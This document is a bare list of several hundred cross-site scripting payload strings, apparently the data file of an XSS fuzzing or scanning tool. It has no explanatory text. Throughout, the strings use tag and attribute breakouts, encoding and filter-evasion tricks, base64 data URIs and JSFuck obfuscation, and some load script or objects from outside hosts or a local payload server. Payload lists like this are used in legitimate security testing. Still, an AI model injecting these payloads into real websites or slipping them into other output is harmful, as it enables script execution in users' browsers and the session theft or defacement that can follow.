'javascript:prompt(1)', 'javascript:\\u0070rompt(1)', 'jAvAsCrIpT:prompt(1)', 'http://jsfiddle.net/xboz/c7vvkedv/', '<EMBED SRC="data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==" type="image/svg+xml" AllowScriptAccess="always"></EMBED>', '"><EMBED SRC="data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==" type="image/svg+xml" AllowScriptAccess="always"></EMBED>', '\'><EMBED SRC="data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==" type="image/svg+xml" AllowScriptAccess="always"></EMBED>', '<DIV STYLE="width:\\0065\\0078\\0070\\0072\\0065\\0073\\0073\\0069\\006F\\006E\\0028\\0070\\0072\\006F\\006D\\0070\\0074\\0028\\0031\\0029\\0029">', '"><DIV STYLE="width:\\0065\\0078\\0070\\0072\\0065\\0073\\0073\\0069\\006F\\006E\\0028\\0070\\0072\\006F\\006D\\0070\\0074\\0028\\0031\\0029\\0029">', '\'><DIV STYLE="width:\\0065\\0078\\0070\\0072\\0065\\0073\\0073\\0069\\006F\\006E\\0028\\0070\\0072\\006F\\006D\\0070\\0074\\0028\\0031\\0029\\0029">', 'data:application/x-x509-user-cert;
base64
,PHNjcmlwdD5wcm9tcHQoMSk8L3NjcmlwdD4=', 'data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dHA6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hsaW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAwIiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+cHJvbXB0KDEpOzwvc2NyaXB0Pjwvc3ZnPg==', 'data:text/html;base64,PHNjcmlwdD5wcm9tcHQoMSk8L3NjcmlwdD4=', 'data:text/html;,<script>prompt(1)</script>', '``onerror=prompt(1)', 'alert(/XSS/);', '1;alert(/XSS/);', "1';alert(/XSS/);x='1", "';alert(/XSS/);'", '<svg><script>prompt( 1)</script>', '"><svg><script>prompt( 1)</script>', "'><svg><script>prompt( 1)</script>", '<html> <script> var a="</script><script>alert(1)//";</script> </html>', '"><html> <script> var a="</script><script>alert(1)//";</script> </html>', '\'><html> <script> var a="</script><script>alert(1)//";</script> </html>', '"><script>alert(1)</script>', '</ScrIpt><script>alert(1)</script>', '"><script>alert(1)</script>', '</ScrIpt><script>alert(1)</script>', "'><script>alert(1)</script>", '</ScrIpt><script>alert(1)</script>', "'';}}</script><script>alert(1)</script>", '</ScrIpt><script>alert(1)</script>', '"><script>alert(1)</script>', '</ScrIpt><script>alert(1)</script>', "'><script>alert(1)</script>", '</ScrIpt><script>alert(1)</script>', '<body onpageshow=alert(1)>', '"><body onpageshow=alert(1)>', "'><body onpageshow=alert(1)>", '<body onpageshow=alert(1);>', '"><body onpageshow=alert(1);>', "'><body onpageshow=alert(1);>", '<body/onpageshow=alert(1)>', '"><body/onpageshow=alert(1)>', "'><body/onpageshow=alert(1)>", '<body/onpageshow=alert(1);>', '"><body/onpageshow=alert(1);>', "'><body/onpageshow=alert(1);>", '"><b/onclick="javascript:window.window.window[\'alert\'](1)">bold', "<body language=vbs onload=window.location='data:text/html;base64,PGltZyBzcmM9eCBvbmVycm9yPWFsZXJ0KDEpPg=='>", '"><body language=vbs 
onload=window.location=\'data:text/html;base64,PGltZyBzcmM9eCBvbmVycm9yPWFsZXJ0KDEpPg==\'>', "'><body language=vbs onload=window.location='data:text/html;base64,PGltZyBzcmM9eCBvbmVycm9yPWFsZXJ0KDEpPg=='>", 'behaviour:url\\0028javascript:alert\\0028[0][0]\\0029\\0029', '<iframe src="javascript:x:alert(1)">', '"><iframe src="javascript:x:alert(1)">', '\'><iframe src="javascript:x:alert(1)">', '<a href="javascript:x:alert(1)">x</a>', '"><a href="javascript:x:alert(1)">x</a>', '\'><a href="javascript:x:alert(1)">x</a>', '<a href=jAvascript:alert(1)>X</a>', '"><a href=jAvascript:alert(1)>X</a>', "'><a href=jAvascript:alert(1)>X</a>", '<div contextmenu=x>right-click<menu id=x onshow=alert(1)>', '"><div contextmenu=x>right-click<menu id=x onshow=alert(1)>', "'><div contextmenu=x>right-click<menu id=x onshow=alert(1)>", '";document.body.addEventListener("DOMActivate",alert(1))//', '/*@cc_on @if(1)alert(1)@end', 'var a=0; ((a == 1) ? 2 : alert(1));//', '(0)[\'constructor\'][\'constructor\']("\\141\\154\\145\\162\\164(1)")();', '<input oninput=alert(1)>', '"><input oninput=alert(1)>', "'><input oninput=alert(1)>", '<video onprogress=alert(1)><source src=//a.a>', '"><video onprogress=alert(1)><source src=//a.a>', "'><video onprogress=alert(1)><source src=//a.a>", '<video onprogress=alert(1)><source src=x>', '"><video onprogress=alert(1)><source src=x>', "'><video onprogress=alert(1)><source src=x>", '<video/onprogress=alert(1)><source/src=//a.a>', '"><video/onprogress=alert(1)><source/src=//a.a>', "'><video/onprogress=alert(1)><source/src=//a.a>", '<video/onprogress=alert(1)><source/src=x>', '"><video/onprogress=alert(1)><source/src=x>', "'><video/onprogress=alert(1)><source/src=x>", '<video onprogress=alert(1)><source src=http://127.0.0.1:3555/xss_serve_payloads/X.ogg>', '"><video onprogress=alert(1)><source src=http://127.0.0.1:3555/xss_serve_payloads/X.ogg>', "'><video onprogress=alert(1)><source src=http://127.0.0.1:3555/xss_serve_payloads/X.ogg>", 
'<video/onprogress=alert(1)><source/src=http://127.0.0.1:3555/xss_serve_payloads/X.ogg>', '"><video/onprogress=alert(1)><source/src=http://127.0.0.1:3555/xss_serve_payloads/X.ogg>', "'><video/onprogress=alert(1)><source/src=http://127.0.0.1:3555/xss_serve_payloads/X.ogg>", '<svg onload=\\u0061lert(1)>', '"><svg onload=\\u0061lert(1)>', "'><svg onload=\\u0061lert(1)>", '<meta%20charset=HZ-GB-2312><scrip~}t>alert(1)</scrip~}t>', '"><meta%20charset=HZ-GB-2312><scrip~}t>alert(1)</scrip~}t>', "'><meta%20charset=HZ-GB-2312><scrip~}t>alert(1)</scrip~}t>", '<meta charset=HZ-GB-2312><scrip~}t>alert(1)</script>', '"><meta charset=HZ-GB-2312><scrip~}t>alert(1)</script>', "'><meta charset=HZ-GB-2312><scrip~}t>alert(1)</script>", '<meta charset=utf-7><img src=x o%2BAG4-error=alert(1)>', '"><meta charset=utf-7><img src=x o%2BAG4-error=alert(1)>', "'><meta charset=utf-7><img src=x o%2BAG4-error=alert(1)>", '<meta charset=Shift_JIS><script>x="?\\";alert(1)//"</script>', '"><meta charset=Shift_JIS><script>x="?\\";alert(1)//"</script>', '\'><meta charset=Shift_JIS><script>x="?\\";alert(1)//"</script>', 'this["alert"]("X")', "this['alert'](1)", '<script>this["alert"]("X")</script>', '</ScrIpt><script>this["alert"]("X")</script>', '"><script>this["alert"]("X")</script>', '</ScrIpt><script>this["alert"]("X")</script>', '\'><script>this["alert"]("X")</script>', '</ScrIpt><script>this["alert"]("X")</script>', '<svg/onload=t=/aler/.source+/t/.source;window.onerror=window[t];throw+1;//', '"><svg/onload=t=/aler/.source+/t/.source;window.onerror=window[t];throw+1;//', "'><svg/onload=t=/aler/.source+/t/.source;window.onerror=window[t];throw+1;//", '<svg\x0conload=alert(1)>', '"><svg\x0conload=alert(1)>', "'><svg\x0conload=alert(1)>", '<svg><use 
xlink:href="data:image/svg+xml;base64,PHN2ZyBpZD0icmVjdGFuZ2xlIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hsaW5rIiAgICB3aWR0aD0iMTAwIiBoZWlnaHQ9IjEwMCI+PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg0KIDxmb3JlaWduT2JqZWN0IHdpZHRoPSIxMDAiIGhlaWdodD0iNTAiDQogICAgICAgICAgICAgICAgICAgcmVxdWlyZWRFeHRlbnNpb25zPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hodG1sIj4NCgk8ZW1iZWQgeG1sbnM9Imh0dHA6Ly93d3cudzMub3JnLzE5OTkveGh0bWwiIHNyYz0iamF2YXNjcmlwdDphbGVydCgxKSIgLz4NCiAgICA8L2ZvcmVpZ25PYmplY3Q+DQo8L3N2Zz4=#rectangle" />', '"><svg><use xlink:href="data:image/svg+xml;base64,PHN2ZyBpZD0icmVjdGFuZ2xlIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hsaW5rIiAgICB3aWR0aD0iMTAwIiBoZWlnaHQ9IjEwMCI+PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg0KIDxmb3JlaWduT2JqZWN0IHdpZHRoPSIxMDAiIGhlaWdodD0iNTAiDQogICAgICAgICAgICAgICAgICAgcmVxdWlyZWRFeHRlbnNpb25zPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hodG1sIj4NCgk8ZW1iZWQgeG1sbnM9Imh0dHA6Ly93d3cudzMub3JnLzE5OTkveGh0bWwiIHNyYz0iamF2YXNjcmlwdDphbGVydCgxKSIgLz4NCiAgICA8L2ZvcmVpZ25PYmplY3Q+DQo8L3N2Zz4=#rectangle" />', '\'><svg><use xlink:href="data:image/svg+xml;base64,PHN2ZyBpZD0icmVjdGFuZ2xlIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hsaW5rIiAgICB3aWR0aD0iMTAwIiBoZWlnaHQ9IjEwMCI+PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg0KIDxmb3JlaWduT2JqZWN0IHdpZHRoPSIxMDAiIGhlaWdodD0iNTAiDQogICAgICAgICAgICAgICAgICAgcmVxdWlyZWRFeHRlbnNpb25zPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hodG1sIj4NCgk8ZW1iZWQgeG1sbnM9Imh0dHA6Ly93d3cudzMub3JnLzE5OTkveGh0bWwiIHNyYz0iamF2YXNjcmlwdDphbGVydCgxKSIgLz4NCiAgICA8L2ZvcmVpZ25PYmplY3Q+DQo8L3N2Zz4=#rectangle" />', '"-alert(1)-"', '"/alert(1)/"', '"|alert(1)|"', '==alert(1)==', '[alert(1)]+', '^alert(1)^', '|alert(1)|', '&alert(1)&', '>>alert(1)>>', '<form name=self location="javascript:alert(1)"', '"><form name=self location="javascript:alert(1)"', '\'><form name=self location="javascript:alert(1)">', '"><form name=self 
location="javascript:alert(1)"', '"><form name=self location="javascript:alert(1)"', '\'><form name=self location="javascript:alert(1)">', '\'><form name=self location="javascript:alert(1)"', '"><form name=self location="javascript:alert(1)"', '\'><form name=self location="javascript:alert(1)">', '<form name=self location="javascript:alert(1)"', '"><form name=self location="javascript:alert(1)"', '\'><form name=self location="javascript:alert(1)"', "'|\\u0061lert()|'", '<style%0conload=alert(1)>', '"><style%0conload=alert(1)>', "'><style%0conload=alert(1)>", '<ScR<ScRiPt>IpT>prompt(1)<%2FsCr<ScRiPt>IpT>', '"><ScR<ScRiPt>IpT>prompt(1)<%2FsCr<ScRiPt>IpT>', "'><ScR<ScRiPt>IpT>prompt(1)<%2FsCr<ScRiPt>IpT>", '<scrip<script>t>alert(1)</script>', '"><scrip<script>t>alert(1)</script>', "'><scrip<script>t>alert(1)</script>", "javasCript:eval%28'aler'+'t'+'%28%29'%29", '"><img src=x onerror=confirm(1);>', 'Data:text/html;base64,PGltZyBzcmM9eCBvbmVycm9yPWFsZXJ0KDEpPg==', '<img%0D%0Asrc%3Da%0D%0Aonerror%3Dalert%281%29>', '"><img%0D%0Asrc%3Da%0D%0Aonerror%3Dalert%281%29>', "'><img%0D%0Asrc%3Da%0D%0Aonerror%3Dalert%281%29>", '<IMG SRC="jav\tascript:alert(\'X\');">', '"><IMG SRC="jav\tascript:alert(\'X\');">', '\'><IMG SRC="jav\tascript:alert(\'X\');">', '<BODY onload!#$%&()*~+-_.,:;?@[/|\\]^`=alert("X")>', '"><BODY onload!#$%&()*~+-_.,:;?@[/|\\]^`=alert("X")>', '\'><BODY onload!#$%&()*~+-_.,:;?@[/|\\]^`=alert("X")>', '\\";alert(\'X\');//', ''; confirm(1); '', ''; confirm(1); '', '%27; confirm(1); %27', ''; confirm(1); '', '\\u0027 confirm(1); \\u0027', '"; 
[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]][([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]((![]+[])[+!+[]]+(![]+[])[!+[]+!+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]+(!![]+[])[+[]]+(![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[!+[]+!+[]+[+[]]]+[+!+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[!+[]+!+[]+[+[]]])(); "', '"; eval(\'\\u0061\'+\'\\x6c\'+\'e\'+\'r\'+\'t\')(2); "', '"; alert( 3) ; "', '"; javascript:aler\\u0074(4); "', '"; javascript:window.open(\'data:text/html;base64,PGltZyBzcmM9eCBvbmVycm9yPWFsZXJ0KDEpPg==\'); "', '"onmouseover="alert(1)', '"onmouseover="alert(1)', '"onmouseover="alert(1)', '%22onmouseover=%22alert(1)', '"onmouseover="alert(1)', '\\u0022onmouseover=\\u0022alert(1)', 'width:expression(prompt(1))', 'width:ex/**/pression(prompt(1))', 'width:ex/**/pression(prompt(1))', 'width:expression\\28 prompt \\28 1 \\29 \\29', 'width:\\0065\\0078\\0070\\0072\\0065\\0073\\0073\\0069\\006F\\006E\\0028\\0070\\0072\\006F\\006D\\0070\\0074\\0028\\0031\\0029\\0029"', 'background-image: url(javascript:prompt(1))', '<a aa aaa aaaa aaaaa aaaaaa aaaaaaa aaaaaaaa 
aaaaaaaaa aaaaaaaaaa href=javascript:alert(1)>ClickMe', '"><a aa aaa aaaa aaaaa aaaaaa aaaaaaa aaaaaaaa aaaaaaaaa aaaaaaaaaa href=javascript:alert(1)>ClickMe', "'><a aa aaa aaaa aaaaa aaaaaa aaaaaaa aaaaaaaa aaaaaaaaa aaaaaaaaaa href=javascript:alert(1)>ClickMe", '"><img src=x onerror=window.open(\'http://www.opensecurity.in/\');>', '<object data=data:text/html;base64,PGltZyBzcmM9eCBvbmVycm9yPWFsZXJ0KDEpPg==></object>', '"><object data=data:text/html;base64,PGltZyBzcmM9eCBvbmVycm9yPWFsZXJ0KDEpPg==></object>', "'><object data=data:text/html;base64,PGltZyBzcmM9eCBvbmVycm9yPWFsZXJ0KDEpPg==></object>", '<a href="data:text/html;blabla,<script src="http://sternefamily.net/foo.js"></script>​">Click Me</a>', '"><a href="data:text/html;blabla,<script src="http://sternefamily.net/foo.js"></script>​">Click Me</a>', '\'><a href="data:text/html;blabla,<script src="http://sternefamily.net/foo.js"></script>​">Click Me</a>', '<svg+onload=confirm(1);>', '"><svg+onload=confirm(1);>', "'><svg+onload=confirm(1);>", '<svg onload=prompt(1);>', '"><svg onload=prompt(1);>', "'><svg onload=prompt(1);>", '<input+onfocus=alert(1)>', '"><input+onfocus=alert(1)>', "'><input+onfocus=alert(1)>", '???script?alert(1)?/script?', '</script><script>alert(1)</script>', '<a href="j&#x26#x41;vascript:alert%252831337%2529">X</a>', '"><a href="j&#x26#x41;vascript:alert%252831337%2529">X</a>', '\'><a href="j&#x26#x41;vascript:alert%252831337%2529">X</a>', '<scr\\x00ipt>confirm(1);</scr\\x00ipt>', '"><scr\\x00ipt>confirm(1);</scr\\x00ipt>', "'><scr\\x00ipt>confirm(1);</scr\\x00ipt>", '<svg/onload=prompt(1);>', '"><svg/onload=prompt(1);>', "'><svg/onload=prompt(1);>", '<svg><script>alert(/1/)</script>', '"><svg><script>alert(/1/)</script>', "'><svg><script>alert(/1/)</script>", '<isindex action="javas	cript:alert(1)" type=image>', '"><isindex action="javas	cript:alert(1)" type=image>', '\'><isindex action="javas	cript:alert(1)" type=image>', "<form 
action='data:text/html,<script>alert(1)</script>'><button>CLICK", '"><form action=\'data:text/html,<script>alert(1)</script>\'><button>CLICK', "'><form action='data:text/html,<script>alert(1)</script>'><button>CLICK", "<form action='java	scri	pt:alert(1)'><button>CLICK", '"><form action=\'java	scri	pt:alert(1)\'><button>CLICK', "'><form action='java	scri	pt:alert(1)'><button>CLICK", '<form action=javascript
:alert(1)><input type=submit>', '"><form action=javascript
:alert(1)><input type=submit>', "'><form action=javascript
:alert(1)><input type=submit>", '<form action="javas	cript:alert(1)" method="get"><input type="submit" value="Submit"></form>', '"><form action="javas	cript:alert(1)" method="get"><input type="submit" value="Submit"></form>', '\'><form action="javas	cript:alert(1)" method="get"><input type="submit" value="Submit"></form>', '<form action="	javas	cript	:alert(\'X :)\')" autocomplete="on"> First name:<input type="text" name="fname"><br><input type="submit"></form>', '"><form action="	javas	cript	:alert(\'X :)\')" autocomplete="on"> First name:<input type="text" name="fname"><br><input type="submit"></form>', '\'><form action="	javas	cript	:alert(\'X :)\')" autocomplete="on"> First name:<input type="text" name="fname"><br><input type="submit"></form>', '<form id="myform" value="" action=javascript	:eval(document.getElementById(\'myform\').elements[0].value)><textarea>alert(1)</textarea><input type="submit" value="Absenden"></form>', '"><form id="myform" value="" action=javascript	:eval(document.getElementById(\'myform\').elements[0].value)><textarea>alert(1)</textarea><input type="submit" value="Absenden"></form>', '\'><form id="myform" value="" action=javascript	:eval(document.getElementById(\'myform\').elements[0].value)><textarea>alert(1)</textarea><input type="submit" value="Absenden"></form>', '\'">><marquee><img src=x onerror=confirm(1)></marquee>"></plaintext\\></|\\><plaintext/onmouseover=prompt(1)', '"></plaintext\\></|\\><plaintext/onmouseover=prompt(1)', "'></plaintext\\></|\\><plaintext/onmouseover=prompt(1)><script>prompt(1)</script>", '</ScrIpt><script>prompt(1)</script>', '"><script>prompt(1)</script>', '</ScrIpt><script>prompt(1)</script>', "'><script>prompt(1)</script>", '</ScrIpt><script>prompt(1)</script>@gmail.com<isindex formaction=javascript:alert(/X/) type=submit>\'-->"></script><script>alert(1)</script>', '</ScrIpt><script>alert(1)</script>', '"><script>alert(1)</script>', '</ScrIpt><script>alert(1)</script>', "'><script>alert(1)</script>", 
'</ScrIpt><script>alert(1)</script>"><img/id="confirm(1)"/alt="/"src="/"onerror=eval(id)>\'"><img src="http://127.0.0.1:3555/xss_serve_payloads/X.jpg">', '<script>var url = "<!--<script>";//</script>alert(1)</script>', '</ScrIpt><script>var url = "<!--<script>";//</script>alert(1)</script>', '"><script>var url = "<!--<script>";//</script>alert(1)</script>', '</ScrIpt><script>var url = "<!--<script>";//</script>alert(1)</script>', '\'><script>var url = "<!--<script>";//</script>alert(1)</script>', '</ScrIpt><script>var url = "<!--<script>";//</script>alert(1)</script>', '<form id="myform" value=""+{valueOf:location,length:1,__proto__:[],0:"javascript :alert (1)"}"action=javascript	:eval(document.getElementById(\'myform\').elements[0].value)><textarea>alert(1)</textarea><input type="submit" value="Absenden"></form>', '"><form id="myform" value=""+{valueOf:location,length:1,__proto__:[],0:"javascript :alert (1)"}"action=javascript	:eval(document.getElementById(\'myform\').elements[0].value)><textarea>alert(1)</textarea><input type="submit" value="Absenden"></form>', '\'><form id="myform" value=""+{valueOf:location,length:1,__proto__:[],0:"javascript :alert (1)"}"action=javascript	:eval(document.getElementById(\'myform\').elements[0].value)><textarea>alert(1)</textarea><input type="submit" value="Absenden"></form>', '<iframe/src="data:text/html,<svg%09%0A%0B%0C%0D%A0%00%20onload=confirm(1);>">', '"><iframe/src="data:text/html,<svg%09%0A%0B%0C%0D%A0%00%20onload=confirm(1);>">', '\'><iframe/src="data:text/html,<svg%09%0A%0B%0C%0D%A0%00%20onload=confirm(1);>">', '<svg/contentScriptType=text/vbs><script>Execute(MsgBox(chr(75)&chr(67)&chr(70)))', '"><svg/contentScriptType=text/vbs><script>Execute(MsgBox(chr(75)&chr(67)&chr(70)))', "'><svg/contentScriptType=text/vbs><script>Execute(MsgBox(chr(75)&chr(67)&chr(70)))", "<img/src='http://127.0.0.1:3555/xss_serve_payloads/X.jpg' onmouseover=	prompt(1)", '"><img/src=\'http://127.0.0.1:3555/xss_serve_payloads/X.jpg\' onmouseover=	
prompt(1)', "'><img/src='http://127.0.0.1:3555/xss_serve_payloads/X.jpg' onmouseover=	prompt(1)", '<svg><script>alert( 1)', '"><svg><script>alert( 1)', "'><svg><script>alert( 1)", '<embed/src=//goo.gl/nlX0P>', '"><embed/src=//goo.gl/nlX0P>', "'><embed/src=//goo.gl/nlX0P>", '<object/data=//goo.gl/nlX0P>', '"><object/data=//goo.gl/nlX0P>', "'><object/data=//goo.gl/nlX0P>", 'x:anytext/**/xxxx/**/n(alert(1)) ("\\"))))))expressio\\")', "x: /**/ression(alert(1))('\\')exp\\')", '/*@cc_on alert(1) @*/', '{get[alert`1`](){}}', 'a= {get[alert`1`](){}}', 'alert`1`', '-alert`1`-', '+alert`1`+', "+alert(1)+'", '\\u{0000000000000061}lert(1)', '"onmouseover=%0A"confirm(1)', '/src=data:,alert(1)', 'accesskey="X" onclick="alert(1)""', 'accesskey=X onclick=alert(1)', '$})}}}});alert(1);({0:{0:{0:function(){0({', "''+{valueOf:location, toString:[].join,0:'javascript:prompt%281%29?,length:1}", 'javascript://\'/</title></style></textarea></script>--><p"%0A onclick=alert(1)//>*/alert(1)/*', 'javascript://--></script></title></style>"/</textarea>*/<alert(1)/*\'%0A onclick=alert(1)//>a', 'javascript://</title>"/</script></style></textarea/-->*/<alert(1)/*\'%0D%0A onclick=alert(1)//>/', 'javascript://\'/</title></style></textarea></script>--><p"%0D%0A onclick=alert(1)//>*/alert(1)/*', '%09javascript://\'/</title></style></textarea></script>--><p"%0D%0A onclick=alert(1)//>*/alert(1)/*', 'javascript:/*--></title></style></textarea></script><svg/onload=click() onclick=\'+/" /+/ onmouseover=1/+/[*/[]/+alert(1)//\'>', 'javascript:alert(1)//</title></style></script>-->";alert(1)//*/alert(1)/*<a \';alert(1)//\\\' onclick=alert(1)//> %0D %0A alert(1)//', 'javascript:alert(1)//--></script></textarea></style></title><a"//\' onclick=alert(1)//>*/alert(1)/*', 'avascript:/*--></textarea></style></button></script></meta><select/onclick=\'+/"/+/[*/[]/+alert(1)//\'>', '<style>@keyframes x{</style><div style=animation-name:x onanimationstart=alert(1)>', '"><style>@keyframes x{</style><div 
style=animation-name:x onanimationstart=alert(1)>', "'><style>@keyframes x{</style><div style=animation-name:x onanimationstart=alert(1)>", '<div style=\'x:anytext/**/xxxx/**/n(alert(1)) ("\\"))))))expressio\\")\'>aa</div>', '"><div style=\'x:anytext/**/xxxx/**/n(alert(1)) ("\\"))))))expressio\\")\'>aa</div>', '\'><div style=\'x:anytext/**/xxxx/**/n(alert(1)) ("\\"))))))expressio\\")\'>aa</div>', '<div style="x: /**/ression(alert(1))(\'\\\')exp\\\')">', '"><div style="x: /**/ression(alert(1))(\'\\\')exp\\\')">', '\'><div style="x: /**/ression(alert(1))(\'\\\')exp\\\')">', '<script>/*@cc_on alert(1) @*/</script>', '</ScrIpt><script>/*@cc_on alert(1) @*/</script>', '"><script>/*@cc_on alert(1) @*/</script>', '</ScrIpt><script>/*@cc_on alert(1) @*/</script>', "'><script>/*@cc_on alert(1) @*/</script>", '</ScrIpt><script>/*@cc_on alert(1) @*/</script>', '<picture><source srcset=1><img onerror=alert(1)>', '"><picture><source srcset=1><img onerror=alert(1)>', "'><picture><source srcset=1><img onerror=alert(1)>", "<script>''+{valueOf:location, toString:[].join,0:'javascript:prompt%281%29?,length:1}</script>", "</ScrIpt><script>''+{valueOf:location, toString:[].join,0:'javascript:prompt%281%29?,length:1}</script>", '"><script>\'\'+{valueOf:location, toString:[].join,0:\'javascript:prompt%281%29?,length:1}</script>', "</ScrIpt><script>''+{valueOf:location, toString:[].join,0:'javascript:prompt%281%29?,length:1}</script>", "'><script>''+{valueOf:location, toString:[].join,0:'javascript:prompt%281%29?,length:1}</script>", "</ScrIpt><script>''+{valueOf:location, toString:[].join,0:'javascript:prompt%281%29?,length:1}</script>", '<script>alert`1`</script>', '</ScrIpt><script>alert`1`</script>', '"><script>alert`1`</script>', '</ScrIpt><script>alert`1`</script>', "'><script>alert`1`</script>", '</ScrIpt><script>alert`1`</script>', '<svg><script>prompt(1)<p', '"><svg><script>prompt(1)<p', "'><svg><script>prompt(1)<p", '<div/onmouseover=confirm(1)>div</div', 
'"><div/onmouseover=confirm(1)>div</div', "'><div/onmouseover=confirm(1)>div</div", '<input onresize=alert(1)>', '"><input onresize=alert(1)>', "'><input onresize=alert(1)>", '<input onActivate=alert(1) autofocus>', '"><input onActivate=alert(1) autofocus>', "'><input onActivate=alert(1) autofocus>", '<input onBeforeActivate=alert(1) autofocus>', '"><input onBeforeActivate=alert(1) autofocus>', "'><input onBeforeActivate=alert(1) autofocus>", '<input type="hidden" accesskey="X" onclick="alert(1)">', '"><input type="hidden" accesskey="X" onclick="alert(1)">', '\'><input type="hidden" accesskey="X" onclick="alert(1)">', '<script>a= {get[alert`1`](){}}</script>', '</ScrIpt><script>a= {get[alert`1`](){}}</script>', '"><script>a= {get[alert`1`](){}}</script>', '</ScrIpt><script>a= {get[alert`1`](){}}</script>', "'><script>a= {get[alert`1`](){}}</script>", '</ScrIpt><script>a= {get[alert`1`](){}}</script>', '<script>+{[atob`dG9TdHJpbmc`]()alert`1`}</script>', '</ScrIpt><script>+{[atob`dG9TdHJpbmc`]()alert`1`}</script>', '"><script>+{[atob`dG9TdHJpbmc`]()alert`1`}</script>', '</ScrIpt><script>+{[atob`dG9TdHJpbmc`]()alert`1`}</script>', "'><script>+{[atob`dG9TdHJpbmc`]()alert`1`}</script>", '</ScrIpt><script>+{[atob`dG9TdHJpbmc`]()alert`1`}</script>', '<script/src=data:,alert(1)>', '"><script/src=data:,alert(1)>', "'><script/src=data:,alert(1)></script>", '"><script/src=data:,alert(1)>', '"><script/src=data:,alert(1)>', "'><script/src=data:,alert(1)></script>", "'><script/src=data:,alert(1)>", '"><script/src=data:,alert(1)>', "'><script/src=data:,alert(1)></script>", 